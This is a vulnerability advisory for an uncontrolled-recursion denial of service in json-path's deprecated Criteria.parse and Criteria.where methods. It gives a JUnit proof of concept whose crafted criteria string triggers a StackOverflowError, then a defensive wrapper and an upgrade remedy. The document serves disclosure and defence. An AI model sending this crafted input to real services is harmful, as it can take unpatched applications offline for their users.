Affected versions of this package are vulnerable to Stack Overflow (uncontrolled recursion) via the deprecated Criteria.parse and Criteria.where methods. An attacker can disrupt the regular operation of the application (denial of service) by supplying a specially crafted criteria string that makes the parser recurse until the calling thread's stack is exhausted and a StackOverflowError is thrown.
Exploitation requires an insecure server-side configuration, for example handling all requests on a single thread, so that the StackOverflowError raised while parsing one malicious input takes down request handling for the whole application rather than failing only the offending request. Note that StackOverflowError is a java.lang.Error, not an Exception, so a generic catch (Exception e) around the parse call does not contain it.
PoC
import com.jayway.jsonpath.Criteria;
import org.junit.Test;

public class CriteriaFuzzerWhere1 {

    // Expected outcome on affected versions: the deprecated Criteria.where parser
    // recurses on this input until a StackOverflowError is thrown. The Error is
    // not an Exception, so the catch block below does not swallow it and the
    // test fails with the stack overflow.
    @Test
    public void whereFuzzerTest() {
        try {
            Criteria result = Criteria.where("[']',");
        } catch (Exception e) {
            // Only parse exceptions land here; StackOverflowError propagates.
        }
    }
}
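The PoC above catches Exception, which does not stop the StackOverflowError from unwinding the thread that called Criteria.where. The following is an added example (not code from the json-path project or from the original advisory) of a defensive wrapper an application could use while it cannot yet upgrade: it bounds the length of untrusted criteria strings and runs the parse on a throwaway worker thread so that a stack overflow is confined to that thread and surfaces as an ExecutionException. The class name CriteriaGuard, the helper parseUntrusted, the 256-character limit and the one-second timeout are all assumptions chosen for illustration, not values taken from the project or the advisory.

```java
import com.jayway.jsonpath.Criteria;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;

public class CriteriaGuard {

    // Assumed upper bound on the length of a criteria string accepted from
    // untrusted callers; tune to the longest legitimate filter the application needs.
    private static final int MAX_CRITERIA_LENGTH = 256;

    // Assumed wall-clock budget for one parse.
    private static final long PARSE_TIMEOUT_SECONDS = 1;

    /**
     * Parses an untrusted criteria string without letting a StackOverflowError
     * from the (unpatched) recursive parser unwind the caller's thread.
     * Returns null when the input is rejected or parsing fails for any reason.
     */
    public static Criteria parseUntrusted(String raw) {
        if (raw == null || raw.length() > MAX_CRITERIA_LENGTH) {
            return null; // reject before the input ever reaches the parser
        }
        // A dedicated thread owns its own stack; if the parser overflows it,
        // only this worker dies, not the request-handling thread.
        ExecutorService worker = Executors.newSingleThreadExecutor();
        try {
            Future<Criteria> pending = worker.submit(() -> Criteria.where(raw));
            return pending.get(PARSE_TIMEOUT_SECONDS, TimeUnit.SECONDS);
        } catch (ExecutionException e) {
            // FutureTask captures any Throwable thrown by the task, so a
            // StackOverflowError arrives here wrapped, alongside ordinary
            // parse exceptions. Treat both as "input rejected".
            return null;
        } catch (TimeoutException | InterruptedException e) {
            if (e instanceof InterruptedException) {
                Thread.currentThread().interrupt();
            }
            return null;
        } finally {
            worker.shutdownNow();
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: a benign key and the crafted string from the PoC.
        String[] samples = { "price", "[']'," };
        for (String s : samples) {
            Criteria c = parseUntrusted(s);
            System.out.println("input " + s + " -> " + (c == null ? "rejected" : "parsed"));
        }
        // The process reaches this line even on an affected version, because the
        // overflow (if triggered) was confined to the worker thread.
        System.out.println("still running");
    }
}
```

This wrapper is a containment measure, not a fix: the vulnerable parser still runs, a thread per parse is expensive, and an attacker can still burn CPU and thread stacks up to the timeout. The remediation below (upgrading to 2.9.0 or later) removes the underlying recursion problem and should be applied regardless.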
Remediation
Upgrade com.jayway.jsonpath:json-path to version 2.9.0 or higher.